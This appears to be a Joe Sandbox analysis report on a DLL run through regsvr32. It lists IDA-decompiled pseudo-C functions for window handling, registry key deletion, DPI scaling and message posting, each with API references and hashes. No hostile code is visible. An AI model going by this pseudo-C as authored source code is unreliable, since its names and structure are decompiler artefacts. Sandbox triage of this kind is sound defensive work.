                                                                                                                
                                                                                                                				_t80 = __eflags;
                                                                                                                				E1004764D(0x100917b7, __ebx, __edi, __esi);
                                                                                                                				_t78 = __ecx;
                                                                                                                				L1000CDFE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
                                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                                                                                                                				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
                                                                                                                				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
                                                                                                                				E1000C8F5(_t78, _t79 - 0x1c);
                                                                                                                				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                                                                                                                				E1000BF2B(_t79 - 0x40, _t79 - 0x2c);
                                                                                                                				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                                                                                                                				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
                                                                                                                				E1000BFAF(_t79 - 0x40, _t79 - 0x1c);
                                                                                                                				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
                                                                                                                				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
                                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                                                                                                				return E10047725(L1000CE52(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1004302A
                                                                                                                  • Part of subcall function 1000CDFE: __EH_prolog3.LIBCMT ref: 1000CE05
                                                                                                                  • Part of subcall function 1000CDFE: GetWindowDC.USER32(00000000), ref: 1000CE31
                                                                                                                • GetClientRect.USER32 ref: 10043045
                                                                                                                • GetWindowRect.USER32 ref: 10043052
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D93), ref: 1000C909
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D9B), ref: 1000C912
                                                                                                                • OffsetRect.USER32 ref: 10043079
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF50
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF65
                                                                                                                • OffsetRect.USER32 ref: 10043097
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFD4
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFE9
                                                                                                                • SendMessageA.USER32 ref: 100430C1
                                                                                                                  • Part of subcall function 1000CE52: __EH_prolog3.LIBCMT ref: 1000CE59
                                                                                                                  • Part of subcall function 1000CE52: ReleaseDC.USER32(?,00000000), ref: 1000CE76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952362992-0
                                                                                                                • Opcode ID: e9d7e286e1b9ae75c77a8180d9047b3534f23ef26796b9d622b48514738db08e
                                                                                                                • Instruction ID: c88571772fa0b80cc6a0098a865d4c4e15fcb43bc89952879f8554f4dc41fe22
                                                                                                                • Opcode Fuzzy Hash: e9d7e286e1b9ae75c77a8180d9047b3534f23ef26796b9d622b48514738db08e
                                                                                                                • Instruction Fuzzy Hash: 1C21D67691051AEFDB19DBA4CC95DFEB3B8FF08300F004269E656A31A0DB246A06CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003C70C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                
                                                                                                                				_t80 = __eflags;
                                                                                                                				E1004764D(0x100917b7, __ebx, __edi, __esi);
                                                                                                                				_t78 = __ecx;
                                                                                                                				L1000CDFE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
                                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                                                                                                                				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
                                                                                                                				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
                                                                                                                				E1000C8F5(_t78, _t79 - 0x1c);
                                                                                                                				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                                                                                                                				E1000BF2B(_t79 - 0x40, _t79 - 0x2c);
                                                                                                                				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                                                                                                                				 *((intOrPtr*)( *_t78 + 0x148))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
                                                                                                                				E1000BFAF(_t79 - 0x40, _t79 - 0x1c);
                                                                                                                				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
                                                                                                                				 *((intOrPtr*)( *_t78 + 0x14c))(_t79 - 0x40, _t79 - 0x1c);
                                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                                                                                                				return E10047725(L1000CE52(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1004302A
                                                                                                                  • Part of subcall function 1000CDFE: __EH_prolog3.LIBCMT ref: 1000CE05
                                                                                                                  • Part of subcall function 1000CDFE: GetWindowDC.USER32(00000000), ref: 1000CE31
                                                                                                                • GetClientRect.USER32 ref: 10043045
                                                                                                                • GetWindowRect.USER32 ref: 10043052
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D93), ref: 1000C909
                                                                                                                  • Part of subcall function 1000C8F5: ScreenToClient.USER32(?,10012D9B), ref: 1000C912
                                                                                                                • OffsetRect.USER32 ref: 10043079
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF50
                                                                                                                  • Part of subcall function 1000BF2B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 1000BF65
                                                                                                                • OffsetRect.USER32 ref: 10043097
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFD4
                                                                                                                  • Part of subcall function 1000BFAF: IntersectClipRect.GDI32(?,?,?,?,?), ref: 1000BFE9
                                                                                                                • SendMessageA.USER32 ref: 100430C1
                                                                                                                  • Part of subcall function 1000CE52: __EH_prolog3.LIBCMT ref: 1000CE59
                                                                                                                  • Part of subcall function 1000CE52: ReleaseDC.USER32(?,00000000), ref: 1000CE76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952362992-0
                                                                                                                • Opcode ID: 6affbc70d6df2e7f4f5166bf977069b06b295726e7198a2e6cc91a1e4fb8232b
                                                                                                                • Instruction ID: c88571772fa0b80cc6a0098a865d4c4e15fcb43bc89952879f8554f4dc41fe22
                                                                                                                • Opcode Fuzzy Hash: 6affbc70d6df2e7f4f5166bf977069b06b295726e7198a2e6cc91a1e4fb8232b
                                                                                                                • Instruction Fuzzy Hash: 1C21D67691051AEFDB19DBA4CC95DFEB3B8FF08300F004269E656A31A0DB246A06CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 74%
                                                                                                                			E10027605(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v272;
                                                                                                                				void* _v276;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t8;
                                                                                                                				char* _t14;
                                                                                                                				void* _t24;
                                                                                                                				int _t25;
                                                                                                                				void* _t34;
                                                                                                                				char* _t35;
                                                                                                                				void* _t36;
                                                                                                                				signed int _t38;
                                                                                                                
                                                                                                                				_t34 = __edx;
                                                                                                                				_t8 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t8 ^ _t38;
                                                                                                                				_t35 = E1004C810(_a4);
                                                                                                                				if(_t35 != 0) {
                                                                                                                					_t14 =  &(_t35[lstrlenA(_t35)]);
                                                                                                                					if(_t14 != 0) {
                                                                                                                						_push(_t36);
                                                                                                                						_push(_t24);
                                                                                                                						while(1) {
                                                                                                                							 *_t14 = 0;
                                                                                                                							E1004D4A9(_t35, _t14);
                                                                                                                							if(RegOpenKeyA(0x80000000, _t35,  &_v276) != 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t25 = 0;
                                                                                                                							if(RegEnumKeyA(_v276, 0,  &_v272, 0x105) == 0) {
                                                                                                                								_t25 = 1;
                                                                                                                							}
                                                                                                                							RegCloseKey(_v276);
                                                                                                                							if(_t25 == 0) {
                                                                                                                								RegDeleteKeyA(0x80000000, _t35);
                                                                                                                								_t14 = E1004D3FF(_t35, 0x5c);
                                                                                                                								_t46 = _t14;
                                                                                                                								if(_t14 != 0) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_pop(_t24);
                                                                                                                						_pop(_t36);
                                                                                                                					}
                                                                                                                					_push(_t35);
                                                                                                                					E100470E9(_t24, _t35, _t36, _t46);
                                                                                                                				}
                                                                                                                				return E1004763E(1, _t24, _v8 ^ _t38, _t34, _t35, _t36);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • __strdup.LIBCMT ref: 1002761D
                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 1002762E
                                                                                                                  • Part of subcall function 1004D4A9: __mbsdec_l.LIBCMT ref: 1004D4B3
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 10027654
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 10027673
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10027684
                                                                                                                • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 10027690
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseDeleteEnumOpen__mbsdec_l__strduplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2107731021-0
                                                                                                                • Opcode ID: 70d7aa6270cf098f979baa59afcea3b92871a96ea337fb48cd94e3f95162b8f2
                                                                                                                • Instruction ID: 60820bd84a7cae173fc4976681b347de2981e602b7a1f39c4aa5d16319027221
                                                                                                                • Opcode Fuzzy Hash: 70d7aa6270cf098f979baa59afcea3b92871a96ea337fb48cd94e3f95162b8f2
                                                                                                                • Instruction Fuzzy Hash: F011C4356005196EE315DBA8DC89FEB7BECEF46649F2100AAF909D2040DF74AD418A69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E100201CD(intOrPtr __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				void _v68;
                                                                                                                				int _v72;
                                                                                                                				struct tagPOINT _v76;
                                                                                                                				struct HWND__* _v80;
                                                                                                                				struct tagPOINT _v84;
                                                                                                                				intOrPtr _v88;
                                                                                                                				intOrPtr _v92;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t23;
                                                                                                                				intOrPtr _t25;
                                                                                                                				int _t29;
                                                                                                                				struct HDC__* _t42;
                                                                                                                				signed int _t44;
                                                                                                                				void* _t50;
                                                                                                                				void* _t55;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t57;
                                                                                                                
                                                                                                                				_t50 = __edx;
                                                                                                                				_t23 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t23 ^ _t57;
                                                                                                                				_t25 = _a8;
                                                                                                                				_t55 = _a4;
                                                                                                                				_v92 = __ecx;
                                                                                                                				_v88 = _t25;
                                                                                                                				if(_t25 == 0) {
                                                                                                                					_t42 = GetDC(0);
                                                                                                                				} else {
                                                                                                                					_t42 =  *(_t25 + 8);
                                                                                                                				}
                                                                                                                				_t44 = 0xf;
                                                                                                                				memcpy( &_v68, _t55, _t44 << 2);
                                                                                                                				_t29 = MulDiv(GetDeviceCaps(_t42, 0x5a), _v68, 0x2d0);
                                                                                                                				_t56 = DPtoLP;
                                                                                                                				_v72 = _t29;
                                                                                                                				_v76 = 0;
                                                                                                                				DPtoLP(_t42,  &_v76, 1);
                                                                                                                				_v84 = 0;
                                                                                                                				_v80 = 0;
                                                                                                                				DPtoLP(_t42,  &_v84, 1);
                                                                                                                				_v68 =  ~(E10049165(_v72 - _v80));
                                                                                                                				if(_v88 == 0) {
                                                                                                                					ReleaseDC(0, _t42);
                                                                                                                				}
                                                                                                                				return E1004763E(E1001E424(_v92,  &_v68), _t42, _v8 ^ _t57, _t50, 0, _t56);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 100201F7
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020212
                                                                                                                • MulDiv.KERNEL32 ref: 10020219
                                                                                                                • DPtoLP.GDI32(00000000,?,00000001), ref: 10020234
                                                                                                                • DPtoLP.GDI32(00000000,?,00000001), ref: 10020243
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1002025E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 127614599-0
                                                                                                                • Opcode ID: 72e190af9e980fad07a9f26443095ab5f66548e785b1492687255668b6794a59
                                                                                                                • Instruction ID: 9876b56e36250cf60ecf2c55abee1cb27d42b24326faa1459ea02bd52087e0db
                                                                                                                • Opcode Fuzzy Hash: 72e190af9e980fad07a9f26443095ab5f66548e785b1492687255668b6794a59
                                                                                                                • Instruction Fuzzy Hash: C1210775E00218AFDB00DFE5DC899AEBBB9FB49300F50001AF505EB291CB74A905CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001B312(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                                				struct HWND__* _t7;
                                                                                                                				void* _t13;
                                                                                                                				struct HWND__** _t15;
                                                                                                                				struct HWND__* _t16;
                                                                                                                				struct HWND__* _t17;
                                                                                                                				struct HWND__* _t18;
                                                                                                                
                                                                                                                				_t18 = _a4;
                                                                                                                				_t17 = _t18;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					L5:
                                                                                                                					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                                						L8:
                                                                                                                						_t16 = _t17;
                                                                                                                						_t7 = _t17;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							L10:
                                                                                                                							if(_t18 == 0 && _t17 != 0) {
                                                                                                                								_t17 = GetLastActivePopup(_t17);
                                                                                                                							}
                                                                                                                							_t15 = _a8;
                                                                                                                							if(_t15 != 0) {
                                                                                                                								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                                									 *_t15 =  *_t15 & 0x00000000;
                                                                                                                								} else {
                                                                                                                									 *_t15 = _t16;
                                                                                                                									EnableWindow(_t16, 0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							return _t17;
                                                                                                                						} else {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						do {
                                                                                                                							L9:
                                                                                                                							_t16 = _t7;
                                                                                                                							_t7 = GetParent(_t7);
                                                                                                                						} while (_t7 != 0);
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t17 = GetParent(_t17);
                                                                                                                					L7:
                                                                                                                					if(_t17 != 0) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				_t13 = E1001B2D2();
                                                                                                                				if(_t13 != 0) {
                                                                                                                					L4:
                                                                                                                					_t17 =  *(_t13 + 0x20);
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				_t13 = E10012730();
                                                                                                                				if(_t13 != 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t17 = 0;
                                                                                                                				goto L8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 1001B344
                                                                                                                • GetParent.USER32(?), ref: 1001B352
                                                                                                                • GetParent.USER32(?), ref: 1001B365
                                                                                                                • GetLastActivePopup.USER32(?), ref: 1001B374
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1001B389
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 1001B39C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 670545878-0
                                                                                                                • Opcode ID: d23f73bc6d61cb9be05bd0fc1f8dced6eafdd4e1110b308578c59236263ff7c2
                                                                                                                • Instruction ID: 5eb2a14de721a093d1a5a6b33b515e1c7fa1d211e2aaf4fcf38d1d55c5650deb
                                                                                                                • Opcode Fuzzy Hash: d23f73bc6d61cb9be05bd0fc1f8dced6eafdd4e1110b308578c59236263ff7c2
                                                                                                                • Instruction Fuzzy Hash: B511A072601F3297E262DA6A8D8071B77D8EF46AD1F160154EC61DF250DB70DEA052D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10034CE4(intOrPtr _a4) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				struct HWND__* _t17;
                                                                                                                				struct HWND__* _t19;
                                                                                                                				signed int _t23;
                                                                                                                				intOrPtr _t31;
                                                                                                                				void* _t32;
                                                                                                                				struct HWND__* _t34;
                                                                                                                
                                                                                                                				_v4 = _t31;
                                                                                                                				_t17 = GetWindow(GetDesktopWindow(), 5);
                                                                                                                				_t34 = _t17;
                                                                                                                				_t36 = _t34;
                                                                                                                				if(_t34 == 0) {
                                                                                                                					return _t17;
                                                                                                                				} else {
                                                                                                                					_push(_t32);
                                                                                                                					while(1) {
                                                                                                                						_t32 = E10014011(_t31, _t32, _t34, _t36, _t34);
                                                                                                                						if(_t32 != 0) {
                                                                                                                							_t21 =  *((intOrPtr*)(_v4 + 0x20));
                                                                                                                							if( *((intOrPtr*)(_v4 + 0x20)) != _t34 && E10034C53(_t21, _t34) != 0) {
                                                                                                                								_t23 = GetWindowLongA(_t34, 0xfffffff0);
                                                                                                                								if(_a4 != 0) {
                                                                                                                									__eflags = _t23 & 0x18000000;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										__eflags =  *(_t32 + 0x3c) & 0x00000002;
                                                                                                                										if(__eflags != 0) {
                                                                                                                											__eflags =  *(_v4 + 0xb4);
                                                                                                                											if(__eflags == 0) {
                                                                                                                												ShowWindow(_t34, 4);
                                                                                                                												_t14 = _t32 + 0x3c;
                                                                                                                												 *_t14 =  *(_t32 + 0x3c) & 0xfffffffd;
                                                                                                                												__eflags =  *_t14;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if((_t23 & 0x18000000) == 0x10000000) {
                                                                                                                										ShowWindow(_t34, 0);
                                                                                                                										 *(_t32 + 0x3c) =  *(_t32 + 0x3c) | 0x00000002;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t19 = GetWindow(_t34, 2);
                                                                                                                						_t34 = _t19;
                                                                                                                						if(_t34 == 0) {
                                                                                                                							return _t19;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetDesktopWindow.USER32 ref: 10034CED
                                                                                                                • GetWindow.USER32(00000000), ref: 10034CFA
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10034D33
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10034D4F
                                                                                                                • ShowWindow.USER32(00000000,00000004), ref: 10034D74
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 10034D7D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$DesktopLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 3178490500-0
                                                                                                                • Opcode ID: 7ca15e30d6e3b84138a5ef8b0e7b537632191e1cd8eec9fc3b3d52b4e3121576
                                                                                                                • Instruction ID: 1e3a3d6b286c5198a37a0a2cf80933c151567ab3cee8bfaa98f8781c70b1d42d
                                                                                                                • Opcode Fuzzy Hash: 7ca15e30d6e3b84138a5ef8b0e7b537632191e1cd8eec9fc3b3d52b4e3121576
                                                                                                                • Instruction Fuzzy Hash: 04110E35501F666FE322CF258D89B8B7AD8EF423A2F520244F9518E290CF35E8408AA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E10037D2E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t28;
                                                                                                                				long _t32;
                                                                                                                				void* _t34;
                                                                                                                				void* _t39;
                                                                                                                				void* _t59;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_push(0x18);
                                                                                                                				E10047680(0x10090c67, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t60 - 0x1c)) = __ecx;
                                                                                                                				_push(_t60 - 0x18);
                                                                                                                				_push(_t60 - 0x20);
                                                                                                                				_push( *((intOrPtr*)(_t60 + 0xc)));
                                                                                                                				_push(0x3e8);
                                                                                                                				L100717DA();
                                                                                                                				_t28 = GlobalLock( *(_t60 - 0x18));
                                                                                                                				L1000140B(_t60 - 0x14, E100184C0());
                                                                                                                				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
                                                                                                                				 *(_t60 - 4) = 1;
                                                                                                                				L100011E5(_t60 - 0x14, _t28);
                                                                                                                				_t32 = GlobalUnlock( *(_t60 - 0x18));
                                                                                                                				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
                                                                                                                				_push( *(_t60 - 0x18));
                                                                                                                				_push(0x8000);
                                                                                                                				_push(0x3e4);
                                                                                                                				_push(0x3e8);
                                                                                                                				_push( *((intOrPtr*)(_t60 + 0xc)));
                                                                                                                				L100717D4();
                                                                                                                				_t55 =  *((intOrPtr*)(_t60 - 0x1c));
                                                                                                                				PostMessageA( *(_t60 + 8), 0x3e4,  *( *((intOrPtr*)(_t60 - 0x1c)) + 0x20), _t32);
                                                                                                                				_t34 = E1001795E( *((intOrPtr*)(_t60 - 0x1c)));
                                                                                                                				_t62 = _t34;
                                                                                                                				if(_t34 != 0) {
                                                                                                                					_t59 = E1001ACEF(_t60 - 0x14);
                                                                                                                					_t39 = E1001E302(__ebx, _t55, _t59, _t62);
                                                                                                                					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 4))));
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + 4)))) + 0xa0))(_t59);
                                                                                                                					E1000FED3(_t60 - 0x14, 0xffffffff);
                                                                                                                				}
                                                                                                                				L100013E3( *((intOrPtr*)(_t60 - 0x14)) + 0xfffffff0, _t53);
                                                                                                                				return E10047725(0);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10037D35
